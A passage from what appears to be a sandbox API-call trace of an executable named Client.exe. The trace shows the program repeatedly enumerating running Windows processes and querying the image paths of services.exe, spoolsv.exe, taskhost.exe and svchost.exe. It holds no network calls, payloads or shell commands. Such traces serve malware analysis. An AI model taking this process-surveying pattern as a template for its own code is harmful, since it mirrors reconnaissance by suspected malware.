szExeFile="svchost.exe")) returned 1 [0290.770] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.771] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.772] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.773] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0290.774] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0290.774] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0290.775] CloseHandle (hObject=0x178) returned 1 [0290.775] CloseHandle (hObject=0x170) returned 1 [0290.865] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0290.865] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0290.867] CloseHandle (hObject=0x170) returned 1 [0290.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0ad8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0290.867] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4e8) returned 0x170 [0290.868] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\spoolsv.exe", lpdwSize=0x18fd48) returned 1 [0290.871] CloseHandle (hObject=0x170) returned 1 [0290.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\spoolsv.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\spoolsv.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\spoolsv.exe", cchWideChar=31, lpMultiByteStr=0x9e0ad8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\spoolsv.exee", lpUsedDefaultChar=0x0) returned 31 [0290.871] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4e8) returned 0x170 [0290.871] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\spoolsv.exe", lpdwSize=0x18fd40) returned 1 [0290.874] CloseHandle (hObject=0x170) returned 1 [0290.875] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4e8) returned 0x170 [0290.875] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\spoolsv.exe", lpdwSize=0x18fd48) returned 1 [0290.878] CloseHandle (hObject=0x170) returned 1 [0290.878] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4e8) returned 0x170 [0290.878] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\spoolsv.exe", lpdwSize=0x18fd48) returned 1 [0290.881] CloseHandle (hObject=0x170) returned 1 [0290.881] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x508) returned 0x170 [0290.881] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.881] CloseHandle (hObject=0x170) returned 1 [0290.881] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x508) returned 0x170 [0290.881] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\taskhost.exe", lpdwSize=0x18fd44) returned 1 [0290.885] CloseHandle (hObject=0x170) returned 1 [0290.885] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.889] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.890] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.891] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.892] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.894] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.896] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.898] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.353] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.355] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.356] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.357] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.358] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.359] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.360] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.360] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.361] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.362] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.363] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.364] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.365] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.366] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.367] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0291.367] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0291.367] CloseHandle (hObject=0x178) returned 1 [0291.368] CloseHandle (hObject=0x170) returned 1 [0291.368] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0291.368] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0291.370] CloseHandle (hObject=0x170) returned 1 [0291.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0291.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0291.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0b08, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0291.370] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x508) returned 0x170 [0291.370] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\taskhost.exe", lpdwSize=0x18fd48) returned 1 [0291.373] CloseHandle (hObject=0x170) returned 1 [0291.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\taskhost.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0291.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\taskhost.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0291.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\taskhost.exe", cchWideChar=32, lpMultiByteStr=0x9e0b08, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\taskhost.exe", lpUsedDefaultChar=0x0) returned 32 [0291.374] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x508) returned 0x170 [0291.374] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\taskhost.exe", lpdwSize=0x18fd40) returned 1 [0291.378] CloseHandle (hObject=0x170) returned 1 [0291.378] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x508) returned 0x170 [0291.378] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\taskhost.exe", lpdwSize=0x18fd48) returned 1 [0291.381] CloseHandle (hObject=0x170) returned 1 [0291.381] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x508) returned 0x170 [0291.381] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\taskhost.exe", lpdwSize=0x18fd48) returned 1 [0291.385] CloseHandle (hObject=0x170) returned 1 [0291.385] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0291.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x530) returned 0x170 [0291.385] GetPriorityClass (hProcess=0x170) returned 0x20 [0291.385] CloseHandle (hObject=0x170) returned 1 [0291.385] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x530) returned 0x170 [0291.385] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd44) returned 1 [0291.388] CloseHandle (hObject=0x170) returned 1 [0291.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0291.393] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.394] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.395] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.396] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.397] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.398] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.399] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.447] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.447] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.448] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.449] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.449] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.450] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.451] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.451] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.452] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.453] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.453] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.454] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.455] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.455] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.456] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.457] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0291.457] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0291.457] CloseHandle (hObject=0x178) returned 1 [0291.457] CloseHandle (hObject=0x170) returned 1 [0291.457] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0291.457] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0291.458] CloseHandle (hObject=0x170) returned 1 [0291.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0291.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0291.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0b38, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0291.459] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x530) returned 0x170 [0291.459] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0291.461] CloseHandle (hObject=0x170) returned 1 [0291.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, 